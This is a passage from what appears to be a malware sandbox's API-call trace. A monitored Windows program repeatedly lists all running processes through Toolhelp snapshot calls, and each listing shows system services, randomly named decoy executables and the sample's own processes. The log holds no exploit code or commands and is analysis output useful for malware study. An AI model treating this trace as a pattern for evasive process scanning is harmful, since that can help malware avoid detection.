szExeFile="fired-isolation-deny.exe")) returned 1 [0112.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.306] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.307] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.308] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.319] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.321] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.322] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.323] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.324] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.325] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.326] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.327] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.328] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.329] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.330] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.331] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0112.332] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0112.333] CloseHandle (hObject=0xbc) returned 1 [0112.334] Sleep (dwMilliseconds=0x12c) [0112.766] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0112.771] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.771] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.772] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.773] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.774] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.775] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.776] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.777] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.778] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.779] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.780] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.780] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0112.781] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.782] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0112.783] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.785] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.786] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0112.787] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0112.788] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0112.789] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.790] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0112.791] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0112.793] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0112.794] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0112.795] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0112.796] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0112.797] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0112.798] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0112.799] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0112.801] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0112.802] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0112.803] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0112.804] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0112.805] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0112.806] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0112.807] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0112.808] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0112.809] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0112.810] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0112.811] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0112.812] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0112.872] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0112.873] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0112.874] CloseHandle (hObject=0xc4) returned 1 [0112.874] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0112.879] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0112.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0112.880] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0112.881] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0112.882] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0112.883] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0112.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0112.884] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0112.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0112.885] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, 